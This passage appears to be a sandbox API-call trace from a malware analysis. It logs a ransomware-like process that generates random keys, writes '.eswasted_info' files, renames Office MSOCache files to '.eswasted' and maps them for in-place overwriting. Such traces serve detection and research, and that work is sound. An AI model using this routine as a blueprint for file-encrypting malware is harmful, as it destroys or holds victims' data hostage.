Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml.eswasted")) returned 1 [0070.542] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0070.542] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0070.542] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x567 [0070.542] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x567) returned 0x2d0000 [0070.542] CloseHandle (hObject=0x11c) returned 1 [0070.544] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0070.545] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4de120 | out: pbBuffer=0x4de120) returned 1 [0070.545] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.545] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0070.546] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0070.546] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.554] SetEndOfFile (hFile=0x110) returned 1 [0070.557] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0070.557] CloseHandle (hObject=0x110) returned 1 [0070.558] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddd20 | out: hHeap=0x4a0000) returned 1 [0070.558] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd590 | out: hHeap=0x4a0000) returned 1 [0070.558] _aulldvrm () returned 0x0 [0070.558] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0070.559] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0070.559] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.559] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0070.559] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a2) returned 0x4ddd20 [0070.559] lstrcpyW (in: lpString1=0x4dddb8, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0070.559] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0070.559] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0070.560] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e9fd8 | out: pbBuffer=0x4e9fd8) returned 1 [0070.560] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.560] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0070.560] WriteFile (in: hFile=0x110, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0070.561] SetEndOfFile (hFile=0x110) returned 1 [0070.561] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.562] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0070.562] lstrcpyW (in: lpString1=0x4dddb8, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0070.562] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted")) returned 1 [0070.562] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0070.562] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0070.562] GetFileSize (in: hFile=0x118, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x93a [0070.562] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x93a) returned 0x2d0000 [0070.563] CloseHandle (hObject=0x118) returned 1 [0070.565] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0070.566] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4de120 | out: pbBuffer=0x4de120) returned 1 [0070.566] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.566] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0070.566] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0070.566] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.575] SetEndOfFile (hFile=0x110) returned 1 [0070.577] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0070.577] CloseHandle (hObject=0x110) returned 1 [0070.579] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddd20 | out: hHeap=0x4a0000) returned 1 [0070.579] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1418 | out: hHeap=0x4a0000) returned 1 [0070.579] _aulldvrm () returned 0x0 [0070.579] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0070.580] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0070.580] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.580] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 82 [0070.580] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2ae) returned 0x4ddd20 [0070.580] lstrcpyW (in: lpString1=0x4dddc4, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0070.580] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e09f0 [0070.580] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0070.581] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e09f0 | out: pbBuffer=0x4e09f0) returned 1 [0070.581] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.581] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0070.582] WriteFile (in: hFile=0x110, lpBuffer=0x4e09f0*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4e09f0*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0070.583] SetEndOfFile (hFile=0x110) returned 1 [0070.583] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.583] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e09f0 | out: hHeap=0x4a0000) returned 1 [0070.583] lstrcpyW (in: lpString1=0x4dddc4, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0070.583] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml.eswasted")) returned 1 [0070.584] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0070.584] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0070.584] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x4cf [0070.584] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4cf) returned 0x2d0000 [0070.584] CloseHandle (hObject=0x11c) returned 1 [0070.590] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0070.591] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4de120 | out: pbBuffer=0x4de120) returned 1 [0070.591] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.591] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0070.591] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0070.591] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.600] SetEndOfFile (hFile=0x110) returned 1 [0070.602] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e09f0 | out: hHeap=0x4a0000) returned 1 [0070.602] CloseHandle (hObject=0x110) returned 1 [0070.603] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddd20 | out: hHeap=0x4a0000) returned 1 [0070.603] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1510 | out: hHeap=0x4a0000) returned 1 [0070.603] _aulldvrm () returned 0x0 [0070.603] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0070.604] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0070.604] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.604] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0070.604] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a2) returned 0x4ddd20 [0070.604] lstrcpyW (in: lpString1=0x4dddb8, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0070.604] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e09f0 [0070.604] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0070.605] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e09f0 | out: pbBuffer=0x4e09f0) returned 1 [0070.605] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.605] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0070.606] WriteFile (in: hFile=0x110, lpBuffer=0x4e09f0*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4e09f0*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0070.606] SetEndOfFile (hFile=0x110) returned 1 [0070.607] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.607] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e09f0 | out: hHeap=0x4a0000) returned 1 [0070.607] lstrcpyW (in: lpString1=0x4dddb8, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0070.607] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted")) returned 1 [0070.607] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0070.607] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0070.607] GetFileSize (in: hFile=0x118, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x73c [0070.608] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x73c) returned 0x2d0000 [0070.608] CloseHandle (hObject=0x118) returned 1 [0070.610] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0070.611] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4de120 | out: pbBuffer=0x4de120) returned 1 [0070.611] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.611] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0070.612] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0070.612] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.621] SetEndOfFile (hFile=0x110) returned 1 [0070.625] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e09f0 | out: hHeap=0x4a0000) returned 1 [0070.625] CloseHandle (hObject=0x110) returned 1 [0070.627] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddd20 | out: hHeap=0x4a0000) returned 1 [0070.627] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1610 | out: hHeap=0x4a0000) returned 1 [0070.627] _aulldvrm () returned 0x0 [0070.627] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0070.627] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0070.628] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.628] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0070.628] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a2) returned 0x4ddd20 [0070.628] lstrcpyW (in: lpString1=0x4dddb8, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0070.628] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e09f0 [0070.628] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0070.628] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e09f0 | out: pbBuffer=0x4e09f0) returned 1 [0070.628] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.628] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0070.642] WriteFile (in: hFile=0x110, lpBuffer=0x4e09f0*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4e09f0*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0070.643] SetEndOfFile (hFile=0x110) returned 1 [0070.643] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.643] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e09f0 | out: hHeap=0x4a0000) returned 1 [0070.643] lstrcpyW (in: lpString1=0x4dddb8, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0070.644] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted")) returned 1 [0070.647] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0070.647] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x120 [0070.647] GetFileSize (in: hFile=0x118, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x1861 [0070.647] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1861) returned 0x2d0000 [0070.647] CloseHandle (hObject=0x118) returned 1 [0070.649] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0070.650] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4e0a38 | out: pbBuffer=0x4e0a38) returned 1 [0070.650] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.650] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0070.651] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0070.651] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.659] SetEndOfFile (hFile=0x110) returned 1 [0070.661] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec6b0 | out: hHeap=0x4a0000) returned 1 [0070.661] CloseHandle (hObject=0x110) returned 1 [0070.662] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddd20 | out: hHeap=0x4a0000) returned 1 [0070.662] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1708 | out: hHeap=0x4a0000) returned 1 [0070.663] _aulldvrm () returned 0x0 [0070.663] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0070.663] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0070.663] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.663] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 79 [0070.663] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a8) returned 0x4ddd20 [0070.663] lstrcpyW (in: lpString1=0x4dddbe, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0070.663] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e09f0 [0070.664] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0070.664] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e09f0 | out: pbBuffer=0x4e09f0) returned 1 [0070.664] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.664] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0070.665] WriteFile (in: hFile=0x110, lpBuffer=0x4e09f0*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4e09f0*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0070.666] SetEndOfFile (hFile=0x110) returned 1 [0070.666] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.666] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e09f0 | out: hHeap=0x4a0000) returned 1 [0070.666] lstrcpyW (in: lpString1=0x4dddbe, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0070.666] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml.eswasted")) returned 1 [0070.666] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0070.666] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0070.667] GetFileSize (in: hFile=0x120, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x251f [0070.667] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, 